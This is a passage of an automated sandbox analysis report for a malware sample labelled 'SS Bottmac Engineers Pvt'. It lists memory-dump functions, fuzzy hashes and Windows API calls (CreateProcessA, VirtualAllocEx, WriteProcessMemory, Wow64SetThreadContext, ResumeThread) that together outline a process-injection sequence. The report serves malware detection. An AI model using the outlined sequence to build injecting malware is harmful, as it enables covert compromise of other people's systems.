                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0bc34e27fb139337d752e84257865a2072352b4f17f1478003e1503f2ae9fa15
                                • Instruction ID: 281080384a4d2f47ef818dbf13f3166e85310f1eeb602d2df627136b56c93567
                                • Opcode Fuzzy Hash: 0bc34e27fb139337d752e84257865a2072352b4f17f1478003e1503f2ae9fa15
                                • Instruction Fuzzy Hash: 2EA17FB1E0021ACFDF24CF68C8457EEBBB6BF48718F148269D819A7240DB749985CF91

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 796d778-796dabd, the same body as the 796d76c entry above with a later entry point; CreateProcessA is called in block 796d907-796d9c1 and the function ends in the self-looping block at 796dabd.
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796D9AE
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: ba0515d48d0bf98035cf98c75eabdefeced1aa95ce7a01f8c45e569752c3aa0a
                                • Instruction ID: 340d57632663559d52a622cdfddd5da413d64e458ab839e8674b5256c89f6c7c
                                • Opcode Fuzzy Hash: ba0515d48d0bf98035cf98c75eabdefeced1aa95ce7a01f8c45e569752c3aa0a
                                • Instruction Fuzzy Hash: 6A916EB1E0021ACFDF24CF69C8457EEBBB6BF48718F148269D819A7240DB749985CF91

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 164b33a-164b5c8; internal calls to 1649db8 (block 164b359), 164b5e0 or 164b5d0 (block 164b36e), 164b000 (164b400), 164b010 (164b448), 164b020 and 164b030 (164b46e); the only API call, GetModuleHandleW, is in block 164b580-164b5ab, reached from 164b4b8.
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0164B59E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: e567a6bd42c53312fd805479cf5db762bedf9d7a8ea68091b4a54e3bde6ed5bb
                                • Instruction ID: f9940352bc056a9345244b5f272703024834450abb42f7d2cf75c8100a5105dc
                                • Opcode Fuzzy Hash: e567a6bd42c53312fd805479cf5db762bedf9d7a8ea68091b4a54e3bde6ed5bb
                                • Instruction Fuzzy Hash: 82811170A00B058FD725DF29D88479ABBF1FF88204F04892ED48ADBB55D734E94ACB90

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 1645d0c-1645e61; CreateActCtxA is called in the entry block 1645d0c-1645dd9 and the function ends in a self-looping block at 1645e61.
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01645DC9
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: 245e6f92f7841a95826e84213c17e8eef7f95fde324c975ff8ba4825dbf9ca24
                                • Instruction ID: da792cdc05b50ad57a48ab7105f471edd9a9b246e01d837591400f88d4ab81d4
                                • Opcode Fuzzy Hash: 245e6f92f7841a95826e84213c17e8eef7f95fde324c975ff8ba4825dbf9ca24
                                • Instruction Fuzzy Hash: B04100B1C00619CFDB24DFA9C844BDDBBB1BF49304F20806AD419AB265DB756946CF91

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 1644560-1645e61, the same body as the 1645d0c entry above reached from the earlier entry point 1644560; CreateActCtxA is called in the entry block and the function ends in a self-looping block at 1645e61.
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01645DC9
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: ad15875c6771c474910c9859dbc2cf794a27714cbb3429669d59b476b330c068
                                • Instruction ID: 76f25b7fc3abb823fbc974e824be2cb2503d5482e66ffac75e885d710045ddf7
                                • Opcode Fuzzy Hash: ad15875c6771c474910c9859dbc2cf794a27714cbb3429669d59b476b330c068
                                • Instruction Fuzzy Hash: 7C411FB0C00619CFDB24CFA9C844B8EBBF1BF48704F20806AD409AB265DB75694ACF90

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 796d4e9-796d5c6; WriteProcessMemory is called in block 796d54e-796d58d, with a short error branch at 796d58f-796d595 before the common exit at 796d596.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0796D580
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 9135d08bc1ba16e556ed29981d89c667e4c89186b874f7e63f67327c63be350c
                                • Instruction ID: 09868aee0d73849104f9e12832532fccea83451ca420444a098232a2fee420b4
                                • Opcode Fuzzy Hash: 9135d08bc1ba16e556ed29981d89c667e4c89186b874f7e63f67327c63be350c
                                • Instruction Fuzzy Hash: D62104B5A002599FDB10DFA9C884AEEBBF5FF48314F10842AE919A7244C7789645CBA0

                                Control-flow Graph

                                • Rendered graph omitted (executed / not-executed colouring is not recoverable from text). Basic blocks 796d4f0-796d5c6, the same body as the 796d4e9 entry above with a later entry point; WriteProcessMemory is called in block 796d54e-796d58d.
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0796D580
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: fab954936f9c1e906d0621af591d6d9dcfff1ee0d660714e47966dad09ce8b65
                                • Instruction ID: 7a864bff29e5e3418728783d0ecba4df23b94cebe6c503126d1e9a91113589f9
                                • Opcode Fuzzy Hash: fab954936f9c1e906d0621af591d6d9dcfff1ee0d660714e47966dad09ce8b65
                                • Instruction Fuzzy Hash: 962139B59003599FCF10DFA9C885BEEBBF5FF48314F108429E919A7244C7789944CBA0
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796CF9E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 74ddf4d9a85d8f031f81454ec6dd8d3b606348d2f4bc5455b727dad43bc39e85
                                • Instruction ID: 503a20ce6b865e9c4952f3c0951ffe7685185868cd822e8d137297105d0724a5
                                • Opcode Fuzzy Hash: 74ddf4d9a85d8f031f81454ec6dd8d3b606348d2f4bc5455b727dad43bc39e85
                                • Instruction Fuzzy Hash: D42138B19002099FDB10DFAAC4857EEBFF4EF89314F14842AE459A7251CB78A945CFA0
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164D8AF
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: c604a68f0934671e89fbfc7d244bc8e3629443da472546e3b1bfee55f8f631d0
                                • Instruction ID: 0bc20df2a9fdc8c8bede50bfd23f83e3d9ba30d727021fb063a6ef47c81ca79c
                                • Opcode Fuzzy Hash: c604a68f0934671e89fbfc7d244bc8e3629443da472546e3b1bfee55f8f631d0
                                • Instruction Fuzzy Hash: 3021E3B5D002089FDB10CF9AD984AEEBBF5FB48310F14841AE918A7350D378A954CFA0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0796D660
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: e4f7daf0923c887ddbf772144a9159d7184aa669ef579a81939f2513c9adffc2
                                • Instruction ID: 9b213148840fa9d5327c3bfabd4a994f91d752603aac3d4030bbfce88071df51
                                • Opcode Fuzzy Hash: e4f7daf0923c887ddbf772144a9159d7184aa669ef579a81939f2513c9adffc2
                                • Instruction Fuzzy Hash: 7B2128B1D007599FCF10DFAAC885AEEBBF5FF48310F108429E559A7250D7389945CBA1
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0796D660
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 106f90887b6f01de4619768697e58d73447e0f22c06753254d31375f0980c6c0
                                • Instruction ID: 8704ea1ff132618275a90c9a6ec713626b136226f7d0c1e2cea24a454b663189
                                • Opcode Fuzzy Hash: 106f90887b6f01de4619768697e58d73447e0f22c06753254d31375f0980c6c0
                                • Instruction Fuzzy Hash: 402137B1D007499FCB10DFAAC884AEEFBF5FF48310F10842AE519A7250CB389944CBA5
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0796CF9E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: d43569c6a3094a79015b9eafe787892da3378841b938a5204f2135b77debc7f3
                                • Instruction ID: 3ab69b122c6a35473229290b3253208337034ca8a344853a9b117ecec524d1f8
                                • Opcode Fuzzy Hash: d43569c6a3094a79015b9eafe787892da3378841b938a5204f2135b77debc7f3
                                • Instruction Fuzzy Hash: BF2115B19003098FDB10DFAAC4857EEFBF4EF89314F14842AE559A7240CB78A945CFA5
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164D8AF
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: aedf70144b6d4c640c8c056eac67c1750e092e7e587952960192e0a0f8409cfd
                                • Instruction ID: 4274b51516fde92ae898fd46dca3b6674a96876bd666505c61de7d3082dea09d
                                • Opcode Fuzzy Hash: aedf70144b6d4c640c8c056eac67c1750e092e7e587952960192e0a0f8409cfd
                                • Instruction Fuzzy Hash: 2A21C4B5D002489FDB10CF9AD984AEEBFF9FB48310F14841AE918A7350D378A954CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0796D49E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 899ca45c90601972a8ebaacd7f6e1cfc335adf94aabe54e6b75450fd32230823
                                • Instruction ID: a580f7715912e9b7d5a1bb5d895bd3de807cc94a368520c18afa021006c6153b
                                • Opcode Fuzzy Hash: 899ca45c90601972a8ebaacd7f6e1cfc335adf94aabe54e6b75450fd32230823
                                • Instruction Fuzzy Hash: B0115CB59002499FDB20DFAAC8456EFFFF5EF88324F148419E519A7250CB39A554CFA0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0796D49E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 03e9e59a0f8fe14d0f2c0678564926d3d457fa07cc6a495e8514b82a5a01c1dd
                                • Instruction ID: ad97de3cc6188430f0a6b4355254c7e77e76125f8cafe8ab95d0d88725770f5f
                                • Opcode Fuzzy Hash: 03e9e59a0f8fe14d0f2c0678564926d3d457fa07cc6a495e8514b82a5a01c1dd
                                • Instruction Fuzzy Hash: 561137B59002499FDB10DFAAC844AEEBFF5EF88324F148419E519A7250CB79A944CFA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: f722b8f59107febf54f5e14c8c89ddbfd33e04da4f0149aca7e23369c8de578a
                                • Instruction ID: 7520f26f5048e835bd3fd0be45d28f778677be3d6a22299e0fbb653060fa98da
                                • Opcode Fuzzy Hash: f722b8f59107febf54f5e14c8c89ddbfd33e04da4f0149aca7e23369c8de578a
                                • Instruction Fuzzy Hash: 761146B5D002498BDB20DFAAC4497EEFBF5AF88314F20841AD519A7640CB79A944CBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000016.00000002.2398766685.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_7960000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 95140a9aee9ac51b183bddb7be4e939e16f9647dc5b7e475f960a23cc062e0d3
                                • Instruction ID: 819f1e41ea536201be603004f30cb49b110dd57051facbcdf0e24f6bbc43fc6f
                                • Opcode Fuzzy Hash: 95140a9aee9ac51b183bddb7be4e939e16f9647dc5b7e475f960a23cc062e0d3
                                • Instruction Fuzzy Hash: 41113AB5D003498FDB20DFAAC4457EEFBF5EF89314F24841AD519A7240CB79A944CBA4
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0164B59E
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386822930.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_1640000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: d8067719611afbcf190c966faad52fcbdab3fcea139e1ea9a5902ce64743e0b8
                                • Instruction ID: cb14e64339ec5dcc1a3c28fd4255fc0134391ef3949fb3e60c80b531846901a7
                                • Opcode Fuzzy Hash: d8067719611afbcf190c966faad52fcbdab3fcea139e1ea9a5902ce64743e0b8
                                • Instruction Fuzzy Hash: D611DFB5C002498FDB24DF9AC844A9EFBF4AB88314F14841AD919A7710D379A545CFA5
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 093E12D5
                                Memory Dump Source
                                • Source File: 00000016.00000002.2399342950.00000000093E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_93e0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 827c4da0ce6af0c295c8e028a32083f44c4162a32acf8bd06f113144912f2467
                                • Instruction ID: ab8fa856570a66ca1233f4cc61223461ba1d1d593fd0410719562c734374f997
                                • Opcode Fuzzy Hash: 827c4da0ce6af0c295c8e028a32083f44c4162a32acf8bd06f113144912f2467
                                • Instruction Fuzzy Hash: 2D11F2B58002498FDB20CF9AC885BEEBFF4FB48314F10841AE558A3650C379A544CFA5
                                APIs
                                • PostMessageW.USER32(?,?,?,?), ref: 093E12D5
                                Memory Dump Source
                                • Source File: 00000016.00000002.2399342950.00000000093E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093E0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_93e0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: 8ce7ea82a080ed313612f5b364ee8654d5f3e7fa559b033e85b65f3e31cb9990
                                • Instruction ID: f7364d83e1863e58b96aca8b2d39559e64c4b227fbcb4804e52ad0e5cdf5378d
                                • Opcode Fuzzy Hash: 8ce7ea82a080ed313612f5b364ee8654d5f3e7fa559b033e85b65f3e31cb9990
                                • Instruction Fuzzy Hash: 5911D3B58003499FDB10DF9AC845BEEBBF8FB48314F10841AE518A7650C379A544CFA5
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386301410.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15ad000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 700ea772207be431526ce6c5750c0b63a78879d8fd0a98d568cf685001e43ce5
                                • Instruction ID: dc27fc40f89a954521eed7c6e06127e4503945273c110390798eb8dd3fb33a0b
                                • Opcode Fuzzy Hash: 700ea772207be431526ce6c5750c0b63a78879d8fd0a98d568cf685001e43ce5
                                • Instruction Fuzzy Hash: 5021F171580240DFDB05EF58D9C0B2EBFB5FB88318F64C569E9490E656C33AD416CAA2
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d2586e711b15209c7f108ab12f693c184d0545bd22edf798961406e2ae794ed3
                                • Instruction ID: 976e7aca8ea4d05571d465836539776e7e3f6f92a6f02d67766c73306c465e71
                                • Opcode Fuzzy Hash: d2586e711b15209c7f108ab12f693c184d0545bd22edf798961406e2ae794ed3
                                • Instruction Fuzzy Hash: 26210075604208DFCB15DFA8D9C0B26BFB5FB88318F20C969D90A0F256D33AD406CA61
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c8669712101873e2885b778b635fec3291a9c7ba26dab8464523ee891dafb12d
                                • Instruction ID: fcd54f9b77e795fd4581ec2e2f72781382d18d5416519ad430833673966ec873
                                • Opcode Fuzzy Hash: c8669712101873e2885b778b635fec3291a9c7ba26dab8464523ee891dafb12d
                                • Instruction Fuzzy Hash: 3921D3715042449FDB05DF98D5C0B66FBB5FB84328F20C96DD9094F256C33AD406CA61
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72e653d5be1d978851f5992de2ba29d7f62cd0b41f430c60013b91a9aa3b92fc
                                • Instruction ID: f01c5e1d27a1b252857d1bbb0834f4686c9f6461652659de8fe88dbb1b924a42
                                • Opcode Fuzzy Hash: 72e653d5be1d978851f5992de2ba29d7f62cd0b41f430c60013b91a9aa3b92fc
                                • Instruction Fuzzy Hash: 94216A755093848FDB02CF24D994715BF71FB46218F28C5EAD8498F2A7C33A980ACB62
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386301410.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15ad000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction ID: e77f80e7d5c281043baeaf7460adcf0a98bd5df54d2462e404f0323783496bcc
                                • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                • Instruction Fuzzy Hash: FA11DF72444280CFCB02DF54D5C4B1ABF71FB88314F24C6A9D9490F656C33AD45ADBA2
                                Memory Dump Source
                                • Source File: 00000016.00000002.2386419499.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_22_2_15bd000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction ID: 890b2e3d2453aebee30918dd14e4dbac47e80c38a746c85c52bbf13739359c4b
                                • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                • Instruction Fuzzy Hash: 5511BB75504280DFDB02CF54C5C4B19FFB1FB84228F24C6A9D8494F296C33AD40ACB62
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q$$]q
                                • API String ID: 0-182748909
                                • Opcode ID: cab06ab74b14adb1167b9440b0822c3190f17b395ecc25cf20a1a3e1f9d0117b
                                • Instruction ID: becd5e887c56c701898dceb4c17c4422573bfddd478779a79f3912e1040445d9
                                • Opcode Fuzzy Hash: cab06ab74b14adb1167b9440b0822c3190f17b395ecc25cf20a1a3e1f9d0117b
                                • Instruction Fuzzy Hash: CFF18F347002058FDB19EF79D958B6E7BA6BF88700F148528E90A9B3E5DF759C42CB81
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: 1e082e34592763a6d552ac22d36133213444e3b5a124f5d36ff2829e3d619c7c
                                • Instruction ID: 774b2adb2344a15d897fec85b8eed2f5cc25ba9ff5129effa2be7e35c38d80db
                                • Opcode Fuzzy Hash: 1e082e34592763a6d552ac22d36133213444e3b5a124f5d36ff2829e3d619c7c
                                • Instruction Fuzzy Hash: 04C190357002018FDB19EF75D898B6E77A7BF88740F148528D80A9B3A9DF759C46CB81
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: $]q$$]q
                                • API String ID: 0-127220927
                                • Opcode ID: cffd5eb7e2bd5b821fad865cdd261a085c62e9b817c7493d5a2db76ea7419e10
                                • Instruction ID: cca8a5d339bb7889395f93458867f690a33a812886fb6a540c618315b9c1ea1a
                                • Opcode Fuzzy Hash: cffd5eb7e2bd5b821fad865cdd261a085c62e9b817c7493d5a2db76ea7419e10
                                • Instruction Fuzzy Hash: 2EA1BF317003018FDB19EF79D854B6E76A7BF88740F248928E84A9B3E5DF759C428B91
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: fd03c8d23b414d46856a52ff17ea9a1691ac451aac301f615cbab0db2f4cdfa3
                                • Instruction ID: f9c057708ff2bc1fd2732204c19aa6b75ca9d876fb19cb6910d10fa7b4a3b0ab
                                • Opcode Fuzzy Hash: fd03c8d23b414d46856a52ff17ea9a1691ac451aac301f615cbab0db2f4cdfa3
                                • Instruction Fuzzy Hash: 2221F630B002158FCB59EB79855463E7BF2BFC9704B2488A9D549DB396DE34DD02C792
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: LR]q
                                • API String ID: 0-3081347316
                                • Opcode ID: 3fbc8786fca7ca4746a0eb7bbd9ff47115a6d2bccfff43bea0bb8db5a6a64404
                                • Instruction ID: 44ccf21e8a7593e765270f8d8eec54bc311cb5e166a9101bb07a41a548130c5f
                                • Opcode Fuzzy Hash: 3fbc8786fca7ca4746a0eb7bbd9ff47115a6d2bccfff43bea0bb8db5a6a64404
                                • Instruction Fuzzy Hash: 45213730B042569FCB55EB78885067E7BF3BFC5704B284469D08ADB39ADE34DD028392
                                Strings
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID: Haq
                                • API String ID: 0-725504367
                                • Opcode ID: 45cc94c955284d0155c809f78f7724d2e430a3dbb74c762c8484c6477d245b4f
                                • Instruction ID: e6f337492791d4a8002bb01b48b564bdf69f838ce560ebfdd8e1c1297ca8d77d
                                • Opcode Fuzzy Hash: 45cc94c955284d0155c809f78f7724d2e430a3dbb74c762c8484c6477d245b4f
                                • Instruction Fuzzy Hash: D521CF30E482488FCB49EFB898643AE7FB1AF85300F1140FAC448DB696EB344E05C781
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4a611e80274c5684af272e12aeb3e5fd49b0f83b564aa7045bbb4411697730f5
